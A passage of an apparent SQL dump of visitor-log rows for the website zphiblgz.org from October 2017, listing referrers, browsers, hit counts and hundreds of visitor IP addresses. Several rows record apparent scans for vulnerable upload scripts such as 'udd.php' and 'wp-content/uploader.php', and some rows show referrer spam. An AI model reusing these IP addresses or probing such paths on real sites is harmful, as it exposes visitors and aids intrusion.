hiblgz.org','Firefox','Windows','7.0.1','','93.174.93.133','000',1,0),(12844,'2017-10-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.235.227.70','000',1,0),(12845,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.73.179','000',1,0),(12846,'2017-10-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.53.83','000',1,0),(12847,'2017-10-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','34.211.192.183','000',1,0),(12848,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.127.145','000',2,0),(12849,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','170.250.140.52','000',2,0),(12850,'2017-10-17','https://yes-com.com/','Opera','Windows','7.0','','188.163.74.19','000',1,0),(12851,'2017-10-17','https://colobit.biz/?ref=kissska','MSIE','Windows','5.5','','188.163.74.19','000',3,0),(12852,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.169.241','000',1,0),(12853,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','71.46.220.68','000',1,0),(12854,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.212.104','000',1,0),(12855,'2017-10-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',2,0),(12856,'2017-10-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(12857,'2017-10-17','https://liky.co.ua/','MSIE','Windows','3.02','','37.115.191.27','000',2,0),(12858,'2017-10-17','http://zphiblgz.org','Firefox','Windows','29.0','','119.146.140.5','000',2,0),(12859,'2017-10-17','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','174.205.40.90','000',1,0),(12860,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.130','000',1,0),(12861,'2017-10-17','http://zphiblgz.org','MSIE','Windows','7.0','','43.255.82.119','000',1,0),(12862,'2017-10-17','zphiblgz.org','Chrome','Windows','50.0.2661.75','','92.222.92.136','000',1,0),(12863,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.79.107','000',1,0),(12864,'2017-10-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','37.187.129.166','000',1,0),(12865,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.223.200','000',1,0),(12866,'2017-10-17','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.230','000',1,0),(12867,'2017-10-17','zphiblgz.org','Firefox','Macintosh','16.0','','75.99.13.124','000',1,0),(12868,'2017-10-17','http://zphiblgz.org','Chrome','Windows','61.0.3163.79','','136.160.141.182','000',1,0),(12869,'2017-10-17','http://nextrent-crimea.ru/','MSIE','Windows','6.0','','37.115.189.113','000',2,0),(12870,'2017-10-17','http://zphiblgz.org','Chrome','Linux','47.0.2526.35','','212.83.155.65','000',1,0),(12871,'2017-10-17','http://zphiblgz.org','Chrome','Android','61.0.3163.98','','166.137.240.17','000',9,0),(12872,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.86.128','000',1,0),(12873,'2017-10-17','http://zphiblgz.org','MSIE','Windows','7.0','','43.255.82.23','000',1,0),(12874,'2017-10-17','https://creditmoney.com.ua/','Unknown','Unknown','Unknown','','37.115.191.27','000',2,0),(12875,'2017-10-17','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','73.132.243.51','000',1,0),(12876,'2017-10-17','http://zphiblgz.org','Chrome','Linux','46.0.2490.80','','103.208.246.226','000',4,0),(12877,'2017-10-17','http://zphiblgz.org','Chrome','Android','61.0.3163.98','','71.244.137.250','000',1,0),(12878,'2017-10-17','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','71.244.137.250','000',3,0),(12879,'2017-10-17','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.14','000',1,0),(12880,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(12881,'2017-10-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','162.213.3.221','000',1,0),(12882,'2017-10-17','http://technika-remont.ru/','MSIE','Unknown','6.0','','46.118.159.224','000',1,0),(12883,'2017-10-17','http://spravka-medosmotr.ru/','MSIE','Windows','7.0b','','37.115.191.27','000',3,0),(12884,'2017-10-17','http://zphiblgz.org','MSIE','Windows','11.0','','34.209.182.200','000',2,0),(12885,'2017-10-17','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.212.73.141','000',1,0),(12886,'2017-10-17','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.35','000',1,0),(12887,'2017-10-18','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',334,0),(12888,'2017-10-18','http://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(12889,'2017-10-18','http://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.167.240','000',2,0),(12890,'2017-10-18','http://zphiblgz.org','MSIE','Windows','7.0','','43.255.82.23','000',2,0),(12891,'2017-10-18','http://zphiblgz.org','Safari','Macintosh','10.0.3','','138.197.96.210','000',2,0),(12892,'2017-10-18','http://zphiblgz.org','Java','Unknown','1.7.0','','213.209.22.254','000',1,0),(12893,'2017-10-18','http://zphiblgz.org/','Chrome','Windows','53.5.0913.5641','','46.183.144.23','000',2,0),(12894,'2017-10-18','http://www.zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','45.55.149.201','000',2,0),(12895,'2017-10-18','http://zphiblgz.org','Safari','iPhone','6.0','','106.120.173.70','000',1,0),(12896,'2017-10-18','http://zphiblgz.org','Chrome','Windows','32.0.1700.107','','77.123.2.4','000',1,0),(12897,'2017-10-18','http://zphiblgz.org','Chrome','Chrome OS','60.0.3112.114','','69.143.35.179','000',7,0),(12898,'2017-10-18','http://zphiblgz.org','MSIE','Windows','9.0','','69.30.246.114','000',89,0),(12899,'2017-10-18','http://zphiblgz.org','Chrome','Android','61.0.3163.98','','166.137.240.86','000',3,0),(12900,'2017-10-18','http://zphiblgz.org/modules/mod_simplefileuploadv1.3/elements/udd.php','Firefox','Windows','3.5.0','','69.30.246.114','000',5,0),(12901,'2017-10-18','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','174.205.10.95','000',3,0),(12902,'2017-10-18','http://sudexpert66.ru/','MSIE','Windows','7.0a1','','37.115.189.113','000',3,0),(12903,'2017-10-18','http://rockprogblog.com/','MSIE','Windows','7.0b','','37.115.189.113','000',2,0),(12904,'2017-10-18','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','198.12.152.22','000',18,0),(12905,'2017-10-18','http://optom-deshevo.ru/','MSIE','Windows','6.0','','46.118.159.224','000',1,0),(12906,'2017-10-18','http://zphiblgz.org','Firefox','Windows','34.0','','5.141.8.66','000',2,0),(12907,'2017-10-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(12908,'2017-10-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(12909,'2017-10-18','http://zphiblgz.org','Firefox','Windows','10.0.1','','91.250.39.226','000',1,0),(12910,'2017-10-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','95.211.38.163','000',1,0),(12911,'2017-10-18','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.163','000',1,0),(12912,'2017-10-18','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','104.166.88.75','000',1,0),(12913,'2017-10-18','http://ooomeru.ru/','MSIE','Windows','6.0','','188.163.74.19','000',3,0),(12914,'2017-10-18','http://zphiblgz.org','Microsoft','Unknown','Unknown','','138.238.231.141','000',3,0),(12915,'2017-10-18','https://buyclomidonlaine.com/','MSIE','Windows','6.0','','37.115.189.113','000',1,0),(12916,'2017-10-18','http://zphiblgz.org','Edge','Windows','15.15063','','76.21.167.41','000',2,0),(12917,'2017-10-18','http://ivanovo.zrus.org/','Opera','Windows','8.01','','46.118.159.224','000',2,0),(12918,'2017-10-18','http://zphiblgz.org','Firefox','Windows','56.0','','153.214.67.14','000',1,0),(12919,'2017-10-18','https://duckduckgo.com/','Safari','iPhone','11.0','','72.83.222.118','000',6,0),(12920,'2017-10-18','http://testuri.org','Unknown','Unknown','Unknown','','188.121.41.7','000',1,0),(12921,'2017-10-18','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','198.51.197.174','000',5,0),(12922,'2017-10-18','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.218','000',1,0),(12923,'2017-10-18','http://zphiblgz.org/','Chrome','Windows','56.0.2924.87','','46.161.9.3','000',2,0),(12924,'2017-10-18','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','188.213.143.37','000',1,0),(12925,'2017-10-18','http://zphiblgz.org','MSIE','Windows','11.0','','54.70.187.108','000',2,0),(12926,'2017-10-18','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.80','000',1,0),(12927,'2017-10-19','http://zphiblgz.org','Firefox','Windows','34.0','','78.106.39.21','000',2,0),(12928,'2017-10-19','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',104,0),(12929,'2017-10-19','http://zphiblgz.org','Firefox','Windows','40.1','','94.97.92.230','000',2,0),(12930,'2017-10-19','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',2,0),(12931,'2017-10-19','http://zphiblgz.org','curl','Unknown','7.38.0','','195.22.126.98','000',2,0),(12932,'2017-10-19','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','163.172.255.139','000',1,0),(12933,'2017-10-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','98.126.12.67','000',1,0),(12934,'2017-10-19','android-app://com.google.android.googlequicksearchbox','Chrome','Android','61.0.3163.98','','1.75.196.203','000',1,0),(12935,'2017-10-19','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','73.132.243.51','000',2,0),(12936,'2017-10-19','https://voloo.ru/','MSIE','Windows','6.0','','37.115.191.27','000',2,0),(12937,'2017-10-19','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.21','000',1,0),(12938,'2017-10-19','http://zphiblgz.org','Firefox','Windows','34.0','','188.232.63.105','000',2,0),(12939,'2017-10-19','http://zphiblgz.org','Firefox','Windows','40.1','','87.64.25.221','000',2,0),(12940,'2017-10-19','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','198.12.152.22','000',1,0),(12941,'2017-10-19','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.150','000',1,0),(12942,'2017-10-19','http://www.sribno.net/','Opera','Windows','7.02','','188.163.74.19','000',1,0),(12943,'2017-10-19','https://liky.co.ua/','Opera','Windows','6.0','','37.115.191.27','000',1,0),(12944,'2017-10-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.124','000',1,0),(12945,'2017-10-19','https://23kw.ru/','MSIE','Windows','6.0','','46.118.159.224','000',4,0),(12946,'2017-10-19','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','185.70.187.155','000',3,0),(12947,'2017-10-19','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(12948,'2017-10-19','http://zphiblgz.org/cause/scholarship/','Safari','iPhone','11.0','','174.205.9.216','000',1,0),(12949,'2017-10-19','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',2,0),(12950,'2017-10-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',2,0),(12951,'2017-10-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',1,0),(12952,'2017-10-19','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.90','000',1,0),(12953,'2017-10-19','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','174.205.8.179','000',1,0),(12954,'2017-10-19','https://mega-polis.biz.ua/','MSIE','Windows','6.0','','37.115.189.113','000',3,0),(12955,'2017-10-19','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','162.247.192.3','000',2,0),(12956,'2017-10-19','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.16','000',3,0),(12957,'2017-10-19','http://zphiblgz.org','Firefox','Windows','40.1','','92.53.49.181','000',2,0),(12958,'2017-10-19','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.59','000',1,0),(12959,'2017-10-19','https://vykupavto-krasnodar.ru/','Opera','Windows','7.02','','37.115.191.27','000',1,0),(12960,'2017-10-19','http://zphiblgz.org','python-requests','Unknown','2.18.4','','185.81.157.72','000',1,0),(12961,'2017-10-19','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','174.205.14.21','000',1,0),(12962,'2017-10-19','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.208','000',1,0),(12963,'2017-10-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','173.234.234.196','000',1,0),(12964,'2017-10-19','http://zphiblgz.org','Java','Unknown','1.7.0','','213.209.22.254','000',1,0),(12965,'2017-10-19','http://x-lime.net/','Opera','Windows','8.01','','37.115.191.27','000',2,0),(12966,'2017-10-19','http://zphiblgz.org/','Firefox','Windows','27.0','','156.67.106.49','000',2,0),(12967,'2017-10-20','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','198.12.152.22','000',2,0),(12968,'2017-10-20','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',100,0),(12969,'2017-10-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','52.25.46.124','000',1,0),(12970,'2017-10-20','https://vsdshnik.com/','MSIE','Windows','6.0','','178.137.177.108','000',3,0),(12971,'2017-10-20','http://zphiblgz.org','AppleWebKit','Linux','534.34','','54.242.77.83','000',1,0),(12972,'2017-10-20','http://zphiblgz.org','Chrome','Android','61.0.3163.98','','71.244.137.250','000',1,0),(12973,'2017-10-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','192.99.150.97','000',8,0),(12974,'2017-10-20','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','192.99.150.97','000',1,0),(12975,'2017-10-20','http://burger-imperia.com/','Chrome','Linux','37.0.2062.120','','93.115.95.205','000',1,0),(12976,'2017-10-20','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.167','000',5,0),(12977,'2017-10-20','http://cool-wedding.net/','Opera','Windows','9.0','','46.118.159.224','000',2,0),(12978,'2017-10-20','http://zphiblgz.org/history/','Chrome','Android','61.0.3163.98','','174.205.7.50','000',1,0),(12979,'2017-10-20','http://zphiblgz.org','Firefox','Windows','40.1','','84.229.12.8','000',3,0),(12980,'2017-10-20','http://zphiblgz.org','Firefox','Windows','40.1','','115.135.215.239','000',2,0),(12981,'2017-10-20','http://ivanovo.zrus.org/','MSIE','Unknown','6.0','','46.118.159.224','000',3,0),(12982,'2017-10-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.116','000',1,0),(12983,'2017-10-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(12984,'2017-10-20','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(12985,'2017-10-20','http://zphiblgz.org','MSIE','Windows','9.0','','131.253.25.74','000',1,0),(12986,'2017-10-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','169.54.233.126','000',1,0),(12987,'2017-10-20','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.101.194','000',1,0),(12988,'2017-10-20','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.154','000',1,0),(12989,'2017-10-20','http://zphiblgz.org','Firefox','Windows','56.0','','73.213.34.34','000',4,0),(12990,'2017-10-20','http://zphiblgz.org','Chrome','Windows','61.0.3163.91','','54.213.142.106','000',1,0),(12991,'2017-10-20','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.151','000',1,0),(12992,'2017-10-20','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.139','000',1,0),(12993,'2017-10-21','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',133,0),(12994,'2017-10-21','http://zphiblgz.org','MSIE','Windows','7.0','','39.110.234.111','000',2,0),(12995,'2017-10-21','http://zphiblgz.org','Firefox','Windows','10.0.1','','91.250.39.226','000',1,0),(12996,'2017-10-21','http://zphiblgz.org','Firefox','Macintosh','54.0','','138.197.111.117','000',2,0),(12997,'2017-10-21','http://zphiblgz.org','Java','Unknown','1.7.0','','213.209.22.254','000',1,0),(12998,'2017-10-21','http://zphiblgz.org','Safari','iPhone','10.0','','174.205.3.196','000',2,0),(12999,'2017-10-21','http://members.zphiblgz.org/membership-join/','Safari','iPhone','10.0','','174.205.17.117','000',2,0),(13000,'2017-10-21','http://zphiblgz.org','Chrome','Android','61.0.3163.98','','174.205.13.219','000',1,0),(13001,'2017-10-21','http://zphiblgz.org','Chrome','Android','60.0.3112.116','','192.12.13.13','000',2,0),(13002,'2017-10-21','http://zphiblgz.org','Firefox','Windows','48.0','','78.85.185.159','000',1,0),(13003,'2017-10-21','https://www.google.com/','Chrome','Chrome OS','60.0.3112.114','','174.205.19.49','000',6,0),(13004,'2017-10-21','https://www.google.com/','Safari','iPhone','11.0','','174.205.1.93','000',5,0),(13005,'2017-10-21','http://sucuri.net','MSIE','Windows','8.0','','173.255.233.124','000',5,0),(13006,'2017-10-21','http://zphiblgz.org','Ipad','Unknown','Unknown','','59.68.8.140','000',1,0),(13007,'2017-10-21','http://zphiblgz.org','Safari','iPhone','4.0','','173.255.233.124','000',1,0),(13008,'2017-10-21','http://zphiblgz.org','AppleWebkit','Android','534.30','','173.255.233.124','000',1,0),(13009,'2017-10-21','http://www.facebook.com/','Chrome','Windows','17.0.963.79','','173.255.233.124','000',1,0),(13010,'2017-10-21','http://zphiblgz.org','Chrome','iPhone','61.0.3163.73','','192.12.13.13','000',2,0),(13011,'2017-10-21','http://zphiblgz.org','Firefox','Windows','40.1','','85.117.62.202','000',2,0),(13012,'2017-10-21','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.92','000',1,0),(13013,'2017-10-21','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.129','000',1,0),(13014,'2017-10-21','http://zphiblgz.org','MSIE','Windows','6.0','','95.213.217.140','000',1,0),(13015,'2017-10-21','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(13016,'2017-10-21','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(13017,'2017-10-21','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.65','000',1,0),(13018,'2017-10-21','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.85.81.123','000',1,0),(13019,'2017-10-21','http://www.zphiblgz.org','Firefox','Macintosh','54.0','','45.55.242.204','000',1,0),(13020,'2017-10-21','http://zphiblgz.org','Firefox','Windows','34.0','','89.28.167.23','000',2,0),(13021,'2017-10-22','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',94,0),(13022,'2017-10-22','http://zphiblgz.org','Firefox','Windows','40.1','','124.195.213.170','000',1,0),(13023,'2017-10-22','http://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','46.161.9.4','000',1,0),(13024,'2017-10-22','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.86.189','000',1,0),(13025,'2017-10-22','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13026,'2017-10-22','http://zphiblgz.org','Firefox','Windows','34.0','','94.228.207.147','000',2,0),(13027,'2017-10-22','http://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.255.139','000',2,0),(13028,'2017-10-22','http://zphiblgz.org','Firefox','Windows','34.0','','85.26.234.86','000',2,0),(13029,'2017-10-22','http://zphiblgz.org','Chrome','Windows','56.0.2924.87','','212.21.66.6','000',6,0),(13030,'2017-10-22','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(13031,'2017-10-22','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(13032,'2017-10-22','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','107.77.241.3','000',4,0),(13033,'2017-10-22','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','195.22.126.98','000',1,0),(13034,'2017-10-22','http://zphiblgz.org','Safari','iPhone','10.0','','107.218.129.130','000',3,0),(13035,'2017-10-22','http://zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','163.172.4.153','000',1,0),(13036,'2017-10-22','http://zphiblgz.org','Firefox','Windows','34.0','','77.34.10.29','000',2,0),(13037,'2017-10-22','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.206','000',1,0),(13038,'2017-10-22','http://www.google.com/search','Chrome','Linux','41.0.2272.118','','66.249.80.38','000',1,0),(13039,'2017-10-22','http://zphiblgz.org/wp-login.php?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','Chrome','Linux','41.0.2272.118','','66.249.80.32','000',1,0),(13040,'2017-10-22','http://zphiblgz.org','Chrome','Windows','61.0.3163.100','','153.142.215.219','000',2,0),(13041,'2017-10-22','http://zphiblgz.org','Safari','iPhone','10.0','','166.137.139.50','000',2,0),(13042,'2017-10-22','http://www.zphibmaryland.org/chapters/','Safari','iPhone','11.0','','73.201.199.79','000',1,0),(13043,'2017-10-22','http://uptime-alpha.net/zphiblgz.org','Unknown','Unknown','Unknown','','67.215.230.87','000',1,0),(13044,'2017-10-22','http://zphiblgz.org','Unknown','Unknown','Unknown','','210.189.59.178','000',2,0),(13045,'2017-10-22','http://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.195.134','000',2,0),(13046,'2017-10-22','http://zphiblgz.org','Firefox','Linux','21.0','','188.165.233.34','000',49,0),(13047,'2017-10-22','http://zphiblgz.org/scholarship/','Chrome','Chrome OS','60.0.3112.114','','69.143.35.179','000',2,0),(13048,'2017-10-22','http://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',2,0),(13049,'2017-10-23','http://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',1,0),(13050,'2017-10-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','127.0.0.1','000',5,0),(13051,'2017-10-23','https://zphiblgz.org','Chrome','Chrome OS','60.0.3112.114','','69.143.35.179','000',15,0),(13052,'2017-10-23','http://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi5j6qskIbXAhVIa7wKHaYIATgQFgg_MAA&url=http%3A%2F%2Fwww.zphiblgz.org%2Fn_company%2Finfo.html&usg=AOvVaw3oTRJ0FOk4TfQ3hmRoHxbt','MSIE','Windows','11.0','','219.111.32.209','000',4,0),(13053,'2017-10-23','http://uptime-gamma.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.148','000',1,0),(13054,'2017-10-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.147','000',1,0),(13055,'2017-10-23','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','54.194.88.16','000',2,0),(13056,'2017-10-23','https://zphiblgz.org','Firefox','Windows','29.0','','36.67.23.201','000',2,0),(13057,'2017-10-23','https://zphiblgz.org','Firefox','Windows','29.0','','222.223.204.182','000',2,0),(13058,'2017-10-23','https://zphiblgz.org','Firefox','Windows','31.0','','209.128.92.220','000',1,0),(13059,'2017-10-23','http://www.zphibmaryland.org/chapters/','Chrome','Android','61.0.3163.98','','174.205.11.249','000',7,0),(13060,'2017-10-23','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','206.41.181.146','000',2,0),(13061,'2017-10-23','https://zphiblgz.org','Safari','iPhone','10.0','','69.143.35.179','000',4,0),(13062,'2017-10-23','https://zphiblgz.org','Firefox','Windows','56.0','','39.40.18.29','000',2,0),(13063,'2017-10-23','https://zphiblgz.org','Firefox','Windows','40.1','','175.141.84.241','000',3,0),(13064,'2017-10-23','https://zphiblgz.org','Safari','Macintosh','10.0.2','','192.243.53.20','000',1,0),(13065,'2017-10-23','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','198.51.197.174','000',6,0),(13066,'2017-10-23','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(13067,'2017-10-23','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','69.195.247.116','000',4,0),(13068,'2017-10-23','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.187','000',2,0),(13069,'2017-10-23','https://zphiblgz.org','Unknown','Unknown','Unknown','','217.118.136.171','000',1,0),(13070,'2017-10-23','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(13071,'2017-10-23','http://zphiblgz.org','Opera','Windows','8.50','','23.250.29.64','000',4,0),(13072,'2017-10-23','http://uptime-delta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.129','000',1,0),(13073,'2017-10-23','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.133','000',1,0),(13074,'2017-10-23','https://zphiblgz.org','Chrome','Macintosh','43.0.2357.124','','54.187.154.13','000',2,0),(13075,'2017-10-23','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(13076,'2017-10-23','https://zphiblgz.org','Firefox','Windows','40.1','','180.183.168.233','000',1,0),(13077,'2017-10-23','https://zphiblgz.org','MSIE','Windows','10.0','','138.197.111.144','000',2,0),(13078,'2017-10-23','https://zphiblgz.org','Firefox','Windows','40.1','','1.10.199.86','000',3,0),(13079,'2017-10-24','https://search.yahoo.co.jp/','Safari','iPhone','10.0','','126.255.3.82','000',2,0),(13080,'2017-10-24','http://search.yahoo.co.jp/','MSIE','Windows','11.0','','219.118.232.174','000',2,0),(13081,'2017-10-24','https://zphiblgz.org','Chrome','Macintosh','43.0.2357.134','','218.92.147.30','000',2,0),(13082,'2017-10-24','https://zphiblgz.org','Firefox','Windows','34.0','','176.197.163.250','000',1,0),(13083,'2017-10-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.54','000',1,0),(13084,'2017-10-24','http://uptime-beta.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.153','000',2,0),(13085,'2017-10-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.135','000',2,0),(13086,'2017-10-24','http://zphiblgz.org/','Unknown','Unknown','Unknown','','74.115.214.144','000',1,0),(13087,'2017-10-24','zphiblgz.org','Firefox','Macintosh','16.0','','87.98.227.4','000',1,0),(13088,'2017-10-24','https://zphiblgz.org','Safari','iPhone','10.0','','204.126.132.241','000',2,0),(13089,'2017-10-24','http://www.google.com/','Firefox','Windows','24.0','','185.40.4.116','000',1,0),(13090,'2017-10-24','https://search.goo.ne.jp/','MSIE','Windows','11.0','','221.187.54.236','000',2,0),(13091,'2017-10-24','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','192.187.108.186','000',2,0),(13092,'2017-10-24','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.101.169','000',1,0),(13093,'2017-10-24','https://zphiblgz.org','Firefox','Windows','40.1','','171.100.24.224','000',3,0),(13094,'2017-10-24','https://zphiblgz.org','Chrome','Windows','36.0.1985.125','','37.131.217.188','000',4,0),(13095,'2017-10-24','http://site.ru','Chrome','Windows','5.0.375.99','','75.98.174.194','000',1,0),(13096,'2017-10-24','https://zphiblgz.org','Firefox','Windows','40.1','','197.48.95.45','000',3,0),(13097,'2017-10-24','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.147','000',1,0),(13098,'2017-10-24','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.112','','139.162.148.238','000',2,0),(13099,'2017-10-24','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(13100,'2017-10-24','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(13101,'2017-10-24','https://zphiblgz.org','Safari','Macintosh','9.1','','172.104.151.105','000',4,0),(13102,'2017-10-24','http://www.zphibmaryland.org/chapters/','Chrome','Windows','61.0.3163.100','','69.195.247.116','000',2,0),(13103,'2017-10-24','zphiblgz.org','Firefox','Macintosh','16.0','','82.165.140.254','000',2,0),(13104,'2017-10-24','https://zphiblgz.org','Safari','iPhone','10.0','','174.205.12.201','000',1,0),(13105,'2017-10-24','https://zphiblgz.org','Firefox','Windows','48.0','','78.85.185.159','000',1,0),(13106,'2017-10-24','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.208','000',1,0),(13107,'2017-10-24','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(13108,'2017-10-24','https://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.61.44.59','000',2,0),(13109,'2017-10-24','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.139.222','000',2,0),(13110,'2017-10-24','https://zphiblgz.org','Unknown','Unknown','Unknown','','205.201.132.14','000',12,0),(13111,'2017-10-24','https://zphiblgz.org','Safari','iPhone','11.0','','76.21.167.30','000',2,0),(13112,'2017-10-24','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.19.29','000',2,0),(13113,'2017-10-24','https://zphiblgz.org','F